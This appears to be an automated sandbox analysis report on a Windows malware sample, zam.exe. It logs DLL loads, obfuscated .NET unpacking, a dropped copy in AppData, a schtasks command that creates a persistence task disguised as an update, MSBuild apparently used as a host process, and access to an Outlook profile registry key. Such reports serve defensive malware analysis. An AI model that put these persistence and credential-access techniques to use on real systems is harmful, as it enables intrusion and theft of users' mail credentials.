Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\zam.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\zam.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: zam.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: zam.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.zam.exe.363e990.0.raw.unpack, XlF5VlCIHRSQX8M5eh.cs	.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, YTeue59Oa2xSvXIC3I.cs	.Net Code: PMHYSmXAWP System.Reflection.Assembly.Load(byte[])
Source: 0.2.zam.exe.68e0000.5.raw.unpack, XlF5VlCIHRSQX8M5eh.cs	.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.zam.exe.4051320.3.raw.unpack, YTeue59Oa2xSvXIC3I.cs	.Net Code: PMHYSmXAWP System.Reflection.Assembly.Load(byte[])

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065AEA62 push es; ret	16_2_065AEA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065AEAFA push es; ret	16_2_065AEB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065AEB96 push es; ret	16_2_065AEB98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_065AEB8E push es; ret	16_2_065AEB90
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_056AC469 push 00000005h; iretd	17_2_056AC458
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_056AC423 push 00000005h; iretd	17_2_056AC458
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_056C7D10 push 08418B05h; ret	17_2_056C7D23
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_056C9C98 pushfd ; iretd	17_2_056C9CA1
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_056C99D8 push esp; retf	17_2_056C99D9
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_056C88B0 push eax; ret	17_2_056C88B1
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_056CBA60 push eax; mov dword ptr [esp], ecx	17_2_056CBA64
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_056CBA4F push eax; mov dword ptr [esp], ecx	17_2_056CBA64
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Code function: 17_2_056C9A48 pushfd ; retf	17_2_056C9A49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056B2890 push eax; retf	21_2_056B2891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 21_2_056B2EFA pushad ; iretd	21_2_056B2F01

Source: zam.exe	Static PE information: section name: .text entropy: 7.943442272607826
Source: HaNkyQWPIIzrnC.exe.0.dr	Static PE information: section name: .text entropy: 7.943442272607826

Source: 0.2.zam.exe.6eb0000.7.raw.unpack, EZ5tphv76afB8BN3T4.cs	High entropy of concatenated method names: 'uSpxJWpNCR', 'gYExQ6h8Ev', 'rD8xkAMP7U', 'ToString', 'sQwxNKVkT0', 'SLBxh6qc4T', 'qcK3wnmYPa9ZIeXyJTt', 'AkJUxtmN1CrpOlvTGrd', 'UoFjnXmreq980LEOCAe'
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, KLFacfPPeBlNsirhW6P.cs	High entropy of concatenated method names: 'ToString', 'cjybrcyplv', 'wpSbYSfGdk', 'Wi0bjUYAIr', 'CEBbvHxEcc', 'Sj7bINOk06', 'c8CbDyp4wI', 'elhbHmOuQB', 'yxrmnA1lQIEG6oVHECN', 'UMbImT1X2VAXqSaXl3Q'
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, f2xVICVG9ysyI2FOY7.cs	High entropy of concatenated method names: 'Dispose', 'wWpBE1sBFp', 'ougVUnSSyP', 'HNqiiisnvn', 'pc5Bm6E2V6', 'cy9BzQlBNQ', 'ProcessDialogKey', 'PVGVGT28MT', 'xYDVBQcv7c', 'fm2VVhgiBR'
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, TTWHunBF1SAhUfZBLE.cs	High entropy of concatenated method names: 'PvZ0tbBCrc', 'okE0UsQT73', 'd2R0FcaGj3', 'dbi0X4qv8T', 'ck60KoIe04', 'OSc0cDPOhu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, djNsG8IbRCPA9kQyRJ.cs	High entropy of concatenated method names: 'l3w0vquZoV', 'zuA0I3Okwg', 'knk0DD59lu', 'BLY0HROBJg', 'FK20x9AsTk', 'lTm0qLhf0A', 'BLf07Pl0BQ', 'r8M0fQMGpq', 'nMd0sxvgMO', 'ccT0pxfqdT'
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, xw2pwiPb5uFijxoqwOS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'e02bK1MiDl', 'F3sbCpFmKq', 'ywDbJgcbRl', 'BsVbQmWtMi', 'mcebkMIoDy', 'O1RbNNcM7Z', 'Laobhh1KOw'
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, TqLnA8wp9itICWytK6.cs	High entropy of concatenated method names: 'XRZqPOBF9M', 'SF1qLAEPj1', 'vHLqSMICji', 'kwRqaeLdIr', 'nlNqnusZwH', 'kD1qlYWPwJ', 'f4Jq9U5FO6', 'uvwqyKutdU', 'c9MqZTq4wi', 'GgeqWvTUg2'
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, YTeue59Oa2xSvXIC3I.cs	High entropy of concatenated method names: 'Grirj8euvi', 'BOCrv6EQAZ', 'oK8rIoqEgd', 'WaZrD7V1d6', 'r0SrHm6sp7', 'RJ9rxH97Tb', 'rI7rqYFXWh', 'vnqr7Lf3MI', 's6frfyWW1q', 'p4prsbFVx7'
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, zSvBKVUDkKWifbRnPi.cs	High entropy of concatenated method names: 'Dad5BGB4jd', 'xRl5rCYgHe', 'liT5YJPFap', 'MCG5vAI7Bv', 'BVK5ICEBlD', 'wQs5HFtjbZ', 'crH5xhHgdO', 'FNB0hBJ68r', 'FwQ0AuG4nB', 'a8W0EUNt2e'
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, JSQNybPWgnRnI0ufN1y.cs	High entropy of concatenated method names: 'GOF5PptTeE', 'U5N5L5syuY', 'nbJ5ScFbhK', 'vgG5apOl1a', 'qRn5nuA5gn', 'bk25lZkdox', 'bFU59QhvgH', 'ISo5yHmJfC', 'GZM5Z9s9g5', 'MOq5WkQUWU'
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, qhMqFgZyCgIkUpqLHW.cs	High entropy of concatenated method names: 'v12HnnPxwB', 'vLyH9hddu3', 'eZ9DF6EPqW', 'OdLDXbe3pW', 'zi1DcNlF6n', 'uTmD6UKu72', 'vDgDRIppHN', 'fjPD40udo4', 'g9FDMQn8RH', 'dKsD8r7aok'
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, ltsMklpDxUboIgcvHG.cs	High entropy of concatenated method names: 'zkXqvKBdZa', 'jrvqD9cg0B', 'IMYqxHV2at', 'ilPxmhoUaj', 'huaxzRAPV1', 'Gs8qGcB3Pn', 'nOrqB9CP4H', 'zlOqVsayH3', 'FxtqrZCZNa', 'gIUqYfmCBN'
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, gQ3WVv8RptXfRrLPMF.cs	High entropy of concatenated method names: 'IrOBq0hlQ0', 'I5BB7mcZPq', 'KLvBsjs6fk', 'G6mBpUVqON', 'w2MBOGueus', 'GSgBoSLOjQ', 'UGOHyht1hyS9yOqxLW', 'ynHk8cDMRAIbZPNTh0', 'hF8BBGEJK5', 'TW1BrjZ1sU'
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, qDqhN6HIZiYINXNeEI.cs	High entropy of concatenated method names: 'k8rIKfGHFD', 'JbBICNpPQu', 'kaoIJBEf77', 'XIMIQuKJR0', 'wDeIkpggOU', 'O62INFKht4', 'U8OIhgeRTn', 'CVPIA5fMCb', 'U7TIEItWCw', 'pqbImkxyZy'
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, Lo8rHm08bSam4duas5.cs	High entropy of concatenated method names: 'nwxgsc5uf9', 'ztggpkTody', 'ToString', 'rjSgvRCI05', 'eQ7gIXXWvx', 'oo0gDTpbT1', 'BXigHQ79XP', 'nILgxT0Uot', 'qPkgq5wh9e', 'HHag7L8Inh'
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, lM86VVEYR4MvNts1Ay.cs	High entropy of concatenated method names: 'dvvS6NYd8', 'rFiaRFGXP', 'ej8la8xFS', 'ztQ9ANfHk', 'mbTZlVrWO', 'aKxWmgIEG', 'WLvSZydKF6wJ0po1sw', 'xFQ45TIqNB2KFsfMnx', 'gnE0HKHiy', 'dDybfe4Oy'
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, UNZifWTMxKlpBB2t8w.cs	High entropy of concatenated method names: 'QObdyExfHJ', 'WaIdZ1RWKQ', 'MAodt3uDde', 'QcddUP07eK', 'cuxdX94im9', 'vTadcK8YyQ', 'nHZdRYutOw', 'Furd4Ls0WK', 'NLTd8lTECr', 'xs8dwweNHT'
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, H4BihTrPNPAdBGIVVx.cs	High entropy of concatenated method names: 'Rbuxju2xeJ', 'LMYxI04eX8', 'xa0xHf8nX9', 'WNZxq2d4Os', 'k0Bx7YT0nJ', 'vEcHkQe6kI', 'iTwHNZx3Pf', 'gPoHh7uCAf', 'M1BHAyhrfH', 'SgTHE54B9J'
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, F4XoM3zoabwJYSen1C.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IuV5djDE0D', 'QAn5OyAJC7', 'cTW5oVqFO5', 'Cvd5gU0BAb', 'EM0500aYJ3', 'C0o554Zul1', 'hY15bXmEo6'
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, zSL3IwYaMa5J3OF8Y5.cs	High entropy of concatenated method names: 'L2DO8m4ZHR', 'M9DO3jJR8t', 'v5LOKvrNkv', 'uAAOCqeGoG', 'YZiOUhop6a', 'TE2OF2Ok0R', 'l0POXQG46a', 'rN1OcGhiUc', 'ErEO6kSNle', 'W2BORvIM9h'
Source: 0.2.zam.exe.4051320.3.raw.unpack, EZ5tphv76afB8BN3T4.cs	High entropy of concatenated method names: 'uSpxJWpNCR', 'gYExQ6h8Ev', 'rD8xkAMP7U', 'ToString', 'sQwxNKVkT0', 'SLBxh6qc4T', 'qcK3wnmYPa9ZIeXyJTt', 'AkJUxtmN1CrpOlvTGrd', 'UoFjnXmreq980LEOCAe'
Source: 0.2.zam.exe.4051320.3.raw.unpack, KLFacfPPeBlNsirhW6P.cs	High entropy of concatenated method names: 'ToString', 'cjybrcyplv', 'wpSbYSfGdk', 'Wi0bjUYAIr', 'CEBbvHxEcc', 'Sj7bINOk06', 'c8CbDyp4wI', 'elhbHmOuQB', 'yxrmnA1lQIEG6oVHECN', 'UMbImT1X2VAXqSaXl3Q'
Source: 0.2.zam.exe.4051320.3.raw.unpack, f2xVICVG9ysyI2FOY7.cs	High entropy of concatenated method names: 'Dispose', 'wWpBE1sBFp', 'ougVUnSSyP', 'HNqiiisnvn', 'pc5Bm6E2V6', 'cy9BzQlBNQ', 'ProcessDialogKey', 'PVGVGT28MT', 'xYDVBQcv7c', 'fm2VVhgiBR'
Source: 0.2.zam.exe.4051320.3.raw.unpack, TTWHunBF1SAhUfZBLE.cs	High entropy of concatenated method names: 'PvZ0tbBCrc', 'okE0UsQT73', 'd2R0FcaGj3', 'dbi0X4qv8T', 'ck60KoIe04', 'OSc0cDPOhu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.zam.exe.4051320.3.raw.unpack, djNsG8IbRCPA9kQyRJ.cs	High entropy of concatenated method names: 'l3w0vquZoV', 'zuA0I3Okwg', 'knk0DD59lu', 'BLY0HROBJg', 'FK20x9AsTk', 'lTm0qLhf0A', 'BLf07Pl0BQ', 'r8M0fQMGpq', 'nMd0sxvgMO', 'ccT0pxfqdT'
Source: 0.2.zam.exe.4051320.3.raw.unpack, xw2pwiPb5uFijxoqwOS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'e02bK1MiDl', 'F3sbCpFmKq', 'ywDbJgcbRl', 'BsVbQmWtMi', 'mcebkMIoDy', 'O1RbNNcM7Z', 'Laobhh1KOw'
Source: 0.2.zam.exe.4051320.3.raw.unpack, TqLnA8wp9itICWytK6.cs	High entropy of concatenated method names: 'XRZqPOBF9M', 'SF1qLAEPj1', 'vHLqSMICji', 'kwRqaeLdIr', 'nlNqnusZwH', 'kD1qlYWPwJ', 'f4Jq9U5FO6', 'uvwqyKutdU', 'c9MqZTq4wi', 'GgeqWvTUg2'
Source: 0.2.zam.exe.4051320.3.raw.unpack, YTeue59Oa2xSvXIC3I.cs	High entropy of concatenated method names: 'Grirj8euvi', 'BOCrv6EQAZ', 'oK8rIoqEgd', 'WaZrD7V1d6', 'r0SrHm6sp7', 'RJ9rxH97Tb', 'rI7rqYFXWh', 'vnqr7Lf3MI', 's6frfyWW1q', 'p4prsbFVx7'
Source: 0.2.zam.exe.4051320.3.raw.unpack, zSvBKVUDkKWifbRnPi.cs	High entropy of concatenated method names: 'Dad5BGB4jd', 'xRl5rCYgHe', 'liT5YJPFap', 'MCG5vAI7Bv', 'BVK5ICEBlD', 'wQs5HFtjbZ', 'crH5xhHgdO', 'FNB0hBJ68r', 'FwQ0AuG4nB', 'a8W0EUNt2e'
Source: 0.2.zam.exe.4051320.3.raw.unpack, JSQNybPWgnRnI0ufN1y.cs	High entropy of concatenated method names: 'GOF5PptTeE', 'U5N5L5syuY', 'nbJ5ScFbhK', 'vgG5apOl1a', 'qRn5nuA5gn', 'bk25lZkdox', 'bFU59QhvgH', 'ISo5yHmJfC', 'GZM5Z9s9g5', 'MOq5WkQUWU'
Source: 0.2.zam.exe.4051320.3.raw.unpack, qhMqFgZyCgIkUpqLHW.cs	High entropy of concatenated method names: 'v12HnnPxwB', 'vLyH9hddu3', 'eZ9DF6EPqW', 'OdLDXbe3pW', 'zi1DcNlF6n', 'uTmD6UKu72', 'vDgDRIppHN', 'fjPD40udo4', 'g9FDMQn8RH', 'dKsD8r7aok'
Source: 0.2.zam.exe.4051320.3.raw.unpack, ltsMklpDxUboIgcvHG.cs	High entropy of concatenated method names: 'zkXqvKBdZa', 'jrvqD9cg0B', 'IMYqxHV2at', 'ilPxmhoUaj', 'huaxzRAPV1', 'Gs8qGcB3Pn', 'nOrqB9CP4H', 'zlOqVsayH3', 'FxtqrZCZNa', 'gIUqYfmCBN'
Source: 0.2.zam.exe.4051320.3.raw.unpack, gQ3WVv8RptXfRrLPMF.cs	High entropy of concatenated method names: 'IrOBq0hlQ0', 'I5BB7mcZPq', 'KLvBsjs6fk', 'G6mBpUVqON', 'w2MBOGueus', 'GSgBoSLOjQ', 'UGOHyht1hyS9yOqxLW', 'ynHk8cDMRAIbZPNTh0', 'hF8BBGEJK5', 'TW1BrjZ1sU'
Source: 0.2.zam.exe.4051320.3.raw.unpack, qDqhN6HIZiYINXNeEI.cs	High entropy of concatenated method names: 'k8rIKfGHFD', 'JbBICNpPQu', 'kaoIJBEf77', 'XIMIQuKJR0', 'wDeIkpggOU', 'O62INFKht4', 'U8OIhgeRTn', 'CVPIA5fMCb', 'U7TIEItWCw', 'pqbImkxyZy'
Source: 0.2.zam.exe.4051320.3.raw.unpack, Lo8rHm08bSam4duas5.cs	High entropy of concatenated method names: 'nwxgsc5uf9', 'ztggpkTody', 'ToString', 'rjSgvRCI05', 'eQ7gIXXWvx', 'oo0gDTpbT1', 'BXigHQ79XP', 'nILgxT0Uot', 'qPkgq5wh9e', 'HHag7L8Inh'
Source: 0.2.zam.exe.4051320.3.raw.unpack, lM86VVEYR4MvNts1Ay.cs	High entropy of concatenated method names: 'dvvS6NYd8', 'rFiaRFGXP', 'ej8la8xFS', 'ztQ9ANfHk', 'mbTZlVrWO', 'aKxWmgIEG', 'WLvSZydKF6wJ0po1sw', 'xFQ45TIqNB2KFsfMnx', 'gnE0HKHiy', 'dDybfe4Oy'
Source: 0.2.zam.exe.4051320.3.raw.unpack, UNZifWTMxKlpBB2t8w.cs	High entropy of concatenated method names: 'QObdyExfHJ', 'WaIdZ1RWKQ', 'MAodt3uDde', 'QcddUP07eK', 'cuxdX94im9', 'vTadcK8YyQ', 'nHZdRYutOw', 'Furd4Ls0WK', 'NLTd8lTECr', 'xs8dwweNHT'
Source: 0.2.zam.exe.4051320.3.raw.unpack, H4BihTrPNPAdBGIVVx.cs	High entropy of concatenated method names: 'Rbuxju2xeJ', 'LMYxI04eX8', 'xa0xHf8nX9', 'WNZxq2d4Os', 'k0Bx7YT0nJ', 'vEcHkQe6kI', 'iTwHNZx3Pf', 'gPoHh7uCAf', 'M1BHAyhrfH', 'SgTHE54B9J'
Source: 0.2.zam.exe.4051320.3.raw.unpack, F4XoM3zoabwJYSen1C.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IuV5djDE0D', 'QAn5OyAJC7', 'cTW5oVqFO5', 'Cvd5gU0BAb', 'EM0500aYJ3', 'C0o554Zul1', 'hY15bXmEo6'
Source: 0.2.zam.exe.4051320.3.raw.unpack, zSL3IwYaMa5J3OF8Y5.cs	High entropy of concatenated method names: 'L2DO8m4ZHR', 'M9DO3jJR8t', 'v5LOKvrNkv', 'uAAOCqeGoG', 'YZiOUhop6a', 'TE2OF2Ok0R', 'l0POXQG46a', 'rN1OcGhiUc', 'ErEO6kSNle', 'W2BORvIM9h'

Source: C:\Users\user\Desktop\zam.exe

File created: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\zam.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmp8F5A.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
